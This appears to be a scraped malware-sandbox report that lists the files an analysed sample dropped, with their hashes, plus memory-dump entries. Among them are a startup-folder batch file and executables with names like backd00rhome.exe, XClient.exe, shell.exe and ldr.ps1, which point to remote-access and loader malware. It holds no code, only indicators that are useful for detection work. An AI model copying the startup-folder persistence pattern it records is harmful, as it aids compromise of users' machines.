        5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\VCRUNTIME140.dll
        Filesize

        96KB

        MD5

        f12681a472b9dd04a812e16096514974

        SHA1

        6fd102eb3e0b0e6eef08118d71f28702d1a9067c

        SHA256

        d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

        SHA512

        7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\VCRUNTIME140_1.dll
        Filesize

        37KB

        MD5

        75e78e4bf561031d39f86143753400ff

        SHA1

        324c2a99e39f8992459495182677e91656a05206

        SHA256

        1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e

        SHA512

        ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_asyncio.pyd
        Filesize

        62KB

        MD5

        2859c39887921dad2ff41feda44fe174

        SHA1

        fae62faf96223ce7a3e6f7389a9b14b890c24789

        SHA256

        aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9

        SHA512

        790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_brotli.cp311-win_amd64.pyd
        Filesize

        801KB

        MD5

        d9fc15caf72e5d7f9a09b675e309f71d

        SHA1

        cd2b2465c04c713bc58d1c5de5f8a2e13f900234

        SHA256

        1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf

        SHA512

        84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_bz2.pyd
        Filesize

        81KB

        MD5

        4101128e19134a4733028cfaafc2f3bb

        SHA1

        66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

        SHA256

        5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

        SHA512

        4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_cffi_backend.cp311-win_amd64.pyd
        Filesize

        174KB

        MD5

        739d352bd982ed3957d376a9237c9248

        SHA1

        961cf42f0c1bb9d29d2f1985f68250de9d83894d

        SHA256

        9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980

        SHA512

        585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_ctypes.pyd
        Filesize

        120KB

        MD5

        6a9ca97c039d9bbb7abf40b53c851198

        SHA1

        01bcbd134a76ccd4f3badb5f4056abedcff60734

        SHA256

        e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535

        SHA512

        dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_decimal.pyd
        Filesize

        245KB

        MD5

        d47e6acf09ead5774d5b471ab3ab96ff

        SHA1

        64ce9b5d5f07395935df95d4a0f06760319224a2

        SHA256

        d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e

        SHA512

        52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_hashlib.pyd
        Filesize

        62KB

        MD5

        de4d104ea13b70c093b07219d2eff6cb

        SHA1

        83daf591c049f977879e5114c5fea9bbbfa0ad7b

        SHA256

        39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e

        SHA512

        567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_lzma.pyd
        Filesize

        154KB

        MD5

        337b0e65a856568778e25660f77bc80a

        SHA1

        4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

        SHA256

        613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

        SHA512

        19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_multiprocessing.pyd
        Filesize

        32KB

        MD5

        1386dbc6dcc5e0be6fef05722ae572ec

        SHA1

        470f2715fafd5cafa79e8f3b0a5434a6da78a1ba

        SHA256

        0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007

        SHA512

        ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_overlapped.pyd
        Filesize

        48KB

        MD5

        01ad7ca8bc27f92355fd2895fc474157

        SHA1

        15948cd5a601907ff773d0b48e493adf0d38a1a6

        SHA256

        a083e83f609ed7a2fc18a95d44d8f91c9dc74842f33e19e91988e84db94c3b5b

        SHA512

        8fe6ac8430f8dde45c74f45575365753042642dc9fa9defbcf25ae1832baf6abb1ea1ad6d087e4ece5d0590e36cee1beea99845aef6182c1eec4bafdf9557604

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_queue.pyd
        Filesize

        30KB

        MD5

        ff8300999335c939fcce94f2e7f039c0

        SHA1

        4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a

        SHA256

        2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78

        SHA512

        f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_socket.pyd
        Filesize

        76KB

        MD5

        8140bdc5803a4893509f0e39b67158ce

        SHA1

        653cc1c82ba6240b0186623724aec3287e9bc232

        SHA256

        39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769

        SHA512

        d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_ssl.pyd
        Filesize

        155KB

        MD5

        069bccc9f31f57616e88c92650589bdd

        SHA1

        050fc5ccd92af4fbb3047be40202d062f9958e57

        SHA256

        cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32

        SHA512

        0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_uuid.pyd
        Filesize

        23KB

        MD5

        9a4957bdc2a783ed4ba681cba2c99c5c

        SHA1

        f73d33677f5c61deb8a736e8dde14e1924e0b0dc

        SHA256

        f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44

        SHA512

        027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\base_library.zip
        Filesize

        1.4MB

        MD5

        9836732a064983e8215e2e26e5b66974

        SHA1

        02e9a46f5a82fa5de6663299512ca7cd03777d65

        SHA256

        3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f

        SHA512

        1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\certifi\cacert.pem
        Filesize

        292KB

        MD5

        50ea156b773e8803f6c1fe712f746cba

        SHA1

        2c68212e96605210eddf740291862bdf59398aef

        SHA256

        94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47

        SHA512

        01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\charset_normalizer\md.cp311-win_amd64.pyd
        Filesize

        10KB

        MD5

        cbf62e25e6e036d3ab1946dbaff114c1

        SHA1

        b35f91eaf4627311b56707ef12e05d6d435a4248

        SHA256

        06032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37

        SHA512

        04b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
        Filesize

        118KB

        MD5

        bac273806f46cffb94a84d7b4ced6027

        SHA1

        773fbc0435196c8123ee89b0a2fc4d44241ff063

        SHA256

        1d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b

        SHA512

        eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\libcrypto-1_1.dll
        Filesize

        3.3MB

        MD5

        6f4b8eb45a965372156086201207c81f

        SHA1

        8278f9539463f0a45009287f0516098cb7a15406

        SHA256

        976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

        SHA512

        2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\libffi-8.dll
        Filesize

        34KB

        MD5

        32d36d2b0719db2b739af803c5e1c2f5

        SHA1

        023c4f1159a2a05420f68daf939b9ac2b04ab082

        SHA256

        128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c

        SHA512

        a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\libssl-1_1.dll
        Filesize

        686KB

        MD5

        8769adafca3a6fc6ef26f01fd31afa84

        SHA1

        38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

        SHA256

        2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

        SHA512

        fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\multidict\_multidict.cp311-win_amd64.pyd
        Filesize

        46KB

        MD5

        ecc0b2fcda0485900f4b72b378fe4303

        SHA1

        40d9571b8927c44af39f9d2af8821f073520e65a

        SHA256

        bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1

        SHA512

        24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\propcache\_helpers_c.cp311-win_amd64.pyd
        Filesize

        73KB

        MD5

        04444380b89fb22b57e6a72b3ae42048

        SHA1

        cfe9c662cb5ca1704e3f0763d02e0d59c5817d77

        SHA256

        d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4

        SHA512

        9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\pyexpat.pyd
        Filesize

        193KB

        MD5

        1c0a578249b658f5dcd4b539eea9a329

        SHA1

        efe6fa11a09dedac8964735f87877ba477bec341

        SHA256

        d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509

        SHA512

        7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\python3.dll
        Filesize

        64KB

        MD5

        34e49bb1dfddf6037f0001d9aefe7d61

        SHA1

        a25a39dca11cdc195c9ecd49e95657a3e4fe3215

        SHA256

        4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281

        SHA512

        edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\python311.dll
        Filesize

        5.5MB

        MD5

        9a24c8c35e4ac4b1597124c1dcbebe0f

        SHA1

        f59782a4923a30118b97e01a7f8db69b92d8382a

        SHA256

        a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

        SHA512

        9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\select.pyd
        Filesize

        28KB

        MD5

        97ee623f1217a7b4b7de5769b7b665d6

        SHA1

        95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0

        SHA256

        0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790

        SHA512

        20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\setuptools\_vendor\jaraco\text\Lorem ipsum.txt
        Filesize

        1KB

        MD5

        4ce7501f6608f6ce4011d627979e1ae4

        SHA1

        78363672264d9cd3f72d5c1d3665e1657b1a5071

        SHA256

        37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b

        SHA512

        a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\unicodedata.pyd
        Filesize

        1.1MB

        MD5

        bc58eb17a9c2e48e97a12174818d969d

        SHA1

        11949ebc05d24ab39d86193b6b6fcff3e4733cfd

        SHA256

        ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa

        SHA512

        4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\wheel-0.45.0.dist-info\INSTALLER
        Filesize

        4B

        MD5

        365c9bfeb7d89244f2ce01c1de44cb85

        SHA1

        d7a03141d5d6b1e88b6b59ef08b6681df212c599

        SHA256

        ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

        SHA512

        d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\yarl\_quoting_c.cp311-win_amd64.pyd
        Filesize

        95KB

        MD5

        1c6c610e5e2547981a2f14f240accf20

        SHA1

        4a2438293d2f86761ef84cfdf99a6ca86604d0b8

        SHA256

        4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804

        SHA512

        f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n4zygzwc.hsz.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
        Filesize

        315B

        MD5

        b8c9a64544bf22a65f83b894c6ba6363

        SHA1

        e93689a9524557d212312b77b21f6247908b6a23

        SHA256

        601769d041dbb9df8531997687f8c556e9176c92958718cc184f94d8eb77f1ba

        SHA512

        a37f8f35b2fbce71661084dfd82a1ba2f35a79ba08beaf18c2d22af5c4e690d907108249f9a8bbe6f5809e5c0b95f1d549b0f50ee0d20fd0623f2370f11264d1

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
        Filesize

        16B

        MD5

        d29962abc88624befc0135579ae485ec

        SHA1

        e40a6458296ec6a2427bcb280572d023a9862b31

        SHA256

        a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

        SHA512

        4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
        Filesize

        687B

        MD5

        2b1b215c22418f9f99e54594172847a3

        SHA1

        538f84b9c38d17c591de14eaa62bba0369dc6b3e

        SHA256

        1fd635cc5c86e7a55459aa5a07ec330ebe85b94700bd5c799fb40a1822b75840

        SHA512

        d1f4866851d792e50c4379119a398dade723fc062bf6651dfd88e9a226cda0e93512e6fa4155e4eb3347a1027c1c98d4fbdc235f0466a4294a597d8176345b19

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
        Filesize

        1KB

        MD5

        0600919c5fcf4f14ce429dc3942b640b

        SHA1

        581e0191ea06471a367c96007528df73783b98a8

        SHA256

        7cbb4452a1338e21aaa0deada0f61e24fdb215fbd881861b9847939e6852ee6b

        SHA512

        3ceb7c753c74ec8bfd9fae828a1aea61d3fb5fe4787b4e2183e14ac321fcdac7595bdb77bf3f0a19081e1c03aed4035f575b09718902bd73867a41b81fa0da06

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DC2111BAT.bat
        Filesize

        14KB

        MD5

        b4ca7ff5efd0278fef09daf595489560

        SHA1

        112847b2bf3d344b10aae9d6bb375de51b0d3b7b

        SHA256

        5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c

        SHA512

        5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2

        Download Submit

      • C:\Users\Admin\Downloads\haus\AsyncClient.exe
        Filesize

        45KB

        MD5

        9ae47a32295e25abad934f880b2246d2

        SHA1

        c7b027f6946e2343712d5b4e5a0e707a853bf0b1

        SHA256

        3c924a149b80a5bf5862c2e3029dd0717a84b5e640332da71e0fa70eb04ec096

        SHA512

        3563a201544254367f5e2605aedcb0b0ab3e4eb9c2e80e26dd7219c4edd2c47e52880b11712f2903e9d00bed2aaea31fad7bc7633c27c6a9ca739cb8cc6165ff

        Download Submit

      • C:\Users\Admin\Downloads\haus\OLDxTEAM.exe
        Filesize

        290KB

        MD5

        51edcaec1968b2115cd3360f1536c3de

        SHA1

        2858bed0a5dafd25c97608b5d415c4cb94dc41c9

        SHA256

        2be4cdb599fbe73e1d3177599cded9c343fbd32653d0862ca52d09a416fa971d

        SHA512

        f5246ec7ddf5ede76bcdc1cf6ac3c5c77e04e04d97d821b115ca48a4098906f135bd8c42d3d537585a4825a323b342ed067f8ea0b1d87ac6dbfb9931e22b7fa6

        Download Submit

      • C:\Users\Admin\Downloads\haus\Solara_Protect.exe
        Filesize

        63KB

        MD5

        9eb074e0713a33f7a6e499b0fbf2484c

        SHA1

        132ca59a5fb654c3d0794f92f05eaf43e3a7af94

        SHA256

        519f3ceedba4471f3d5178451c1007911145fb6eaf4e259a2c29b8e3483dabb1

        SHA512

        367fbbf6f058ef21367e329c8b0373d482c9c97dfbb42a67b17c9b1dc1d0139ae879c8ddb87b0960c5545746610d2c5690343abb458818c2dea9dbca66f39794

        Download Submit

      • C:\Users\Admin\Downloads\haus\TCP.exe
        Filesize

        45KB

        MD5

        f127aef5829703426ff8399a76c1852c

        SHA1

        17e72d081ceb20119abe7bef8c640d5db48276f6

        SHA256

        6907ab3a0f4e69bf6dcb8c03a18bd8402afa701ade8863a0e15808614ffb1b17

        SHA512

        c3125920567b59119b86e284ed96c3860b1998f9d6b6078b5c2a18aa6b4c56274124fd2f77710bbbf972a6387ef20cb4a5d19c96be2131fb02f6d5692c2384c0

        Download Submit

      • C:\Users\Admin\Downloads\haus\XClient.exe
        Filesize

        80KB

        MD5

        1fdbde7773dca61675f332594d8f7e99

        SHA1

        b993f62c871c311fe9a398ad2424389b1072906e

        SHA256

        439f9b3edd8b69f54c8a03c34f56660b95f345688edfad7911780a41f9839d65

        SHA512

        51a74a252c827f9fd3cbcd39cd6b95d721b97fd25fb8f78574700ccbf60e85d072ffa5b893887d67a2c5f69478df3ce687c6d11632312117bed928800b3e63b6

        Download Submit

      • C:\Users\Admin\Downloads\haus\anne.exe
        Filesize

        45KB

        MD5

        1afe69dfd0013bf97a1ab941b6c5d984

        SHA1

        8dba7082cdcf8e0524a4300ca9ef437e281618ed

        SHA256

        33410cc8e262e90101e87a94f5cbc44c85adbe3a395fc683f99fd2ceb323cd2e

        SHA512

        e5629ba2be6567acfea94bcd10bdef48412074f4b8164436a4a4c28925b1d96e03f5f3640b56b2223a7ff686dde45fd5f446ef28278f3890102535340f41bb97

        Download Submit

      • C:\Users\Admin\Downloads\haus\backd00rhome.exe
        Filesize

        72KB

        MD5

        ef397426691bc35566bc401598e10d60

        SHA1

        40ac43354d2ea80706dae6a60ce5cb668ba35514

        SHA256

        ec34977344bded135083b97756df058d33565bb80a1ab48cccb82999a6b340cf

        SHA512

        023009d6a0b923d582a84a6db93b4b4a5c8017ef2217937490e83df801c56b12a962ba88ec4f28bb1fc2aee7ad393d8c93bd097e27b969f061876ac85339e746

        Download Submit

      • C:\Users\Admin\Downloads\haus\com%20surrogate.exe
        Filesize

        59KB

        MD5

        8843d79e5ece984ef952051cb5b4f601

        SHA1

        72bb266a7aae0320f05276a0ed42753c2dc07f2b

        SHA256

        80d44bb082a49dd49bf5926ea31ca0c225725daa4ba0614ae3ef1e121fdef89c

        SHA512

        e19cb6c484f0415cd3cab9e716a07cd5ae3662ee22b690310081c68ab73617df8fa8236a98d72fbf5ae3b88efefe88e3c845eb42f0bf9b93963c628573c87ba1

        Download Submit

      • C:\Users\Admin\Downloads\haus\evetbeta.exe
        Filesize

        92KB

        MD5

        6f6137e6f85dc8dac7ff87ca4c86af4c

        SHA1

        fc047ad39f8f2f57fa6049e1883ccab24bea8f82

        SHA256

        a370eacabf4af9caa5502c39b40c95eda6be23666231e24da1b56277a222f3e9

        SHA512

        2a3d60bac0a40730b49d361d13000115539c448ef1ecbbffafa22ebe78fc9009db0846e84e7f3c3526d22d5531cedddae8fae7678f453e48876581824cd9dea4

        Download Submit

      • C:\Users\Admin\Downloads\haus\kali_tools.exe
        Filesize

        72KB

        MD5

        0cf225d4e9a1a440b7f9194d56533598

        SHA1

        fb7446f256e389fe8f957ccb34422870b52fb233

        SHA256

        2c042ffcb4b89bf6a65195ca81430a0497a827c125b24aea15822302d4d76a59

        SHA512

        7e8efd8a96545b54762ad2d4998e55332f1162d007ce544b5d6aeb4112f1674924319b9a2369cbb90c08fddfe0549242bf9ac563e54c9ed11d0f633ae7a10853

        Download Submit

      • C:\Users\Admin\Downloads\haus\ldr.ps1
        Filesize

        881B

        MD5

        08a5af8712cc8e8739f368de6a0b0bb1

        SHA1

        fc53d0660f16058f69938aad64363d886c64604e

        SHA256

        1b62f76fe4b8c714af2ae108c56acc447a0507ba58f9b3e645a495b4945a41e2

        SHA512

        5d78167de34a83c89d2ff1a2d59f737d27188a41f0dfa39d292d4aa28c1a25b58cbf64743c837495f191025f8999ff20c8a5313ca50f529f741c74d2cb8186d1

        Download Submit

      • C:\Users\Admin\Downloads\haus\shell.exe
        Filesize

        72KB

        MD5

        b46f3e8790d907a8f6e216b006eb1c95

        SHA1

        a16301af03d94abe661cc11b5ca3da7fc1e6a7bb

        SHA256

        f400dfc798338bf8c960fe04bafe60a3f95d4facd182ab08448b4918efe35262

        SHA512

        16345afb33b8626893da0700b9ac7580cdea3b3d42ace6d137abb9f6e99a0e446d9af2fbb98979b7ea815cab07fb6eb368a590166bdf048deacd7fd63c429de9

        Download Submit

      • memory/1344-244-0x0000000000620000-0x0000000000632000-memory.dmp

        Filesize

        72KB

        Download

      • memory/1608-208-0x0000000000C30000-0x0000000000C42000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2028-224-0x00000000006D0000-0x000000000071E000-memory.dmp

        Filesize

        312KB

        Download

      • memory/2464-301-0x0000021AF2220000-0x0000021AF2230000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2672-308-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2672-440-0x0000000005E50000-0x0000000005EB6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2672-439-0x0000000006390000-0x0000000006934000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3440-192-0x0000000000E60000-0x0000000000E76000-memory.dmp

        Filesize

        88KB

        Download

      • memory/3460-253-0x000002AFFFF20000-0x000002AFFFF42000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3928-302-0x0000000005870000-0x000000000590C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/3928-206-0x0000000000FF0000-0x0000000001006000-memory.dmp

        Filesize

        88KB

        Download

      • memory/4268-205-0x0000000000460000-0x0000000000472000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4276-232-0x0000000000310000-0x000000000032A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4660-389-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4660-392-0x00007FFB04E40000-0x00007FFB04E50000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4660-391-0x00007FFB04E40000-0x00007FFB04E50000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4660-386-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4660-387-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4660-388-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4660-390-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

        Download